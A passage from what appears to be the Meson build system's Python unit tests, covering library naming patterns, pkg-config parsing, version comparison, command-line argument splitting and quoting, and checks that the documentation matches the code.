stc = patterns[platform]['static']
shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
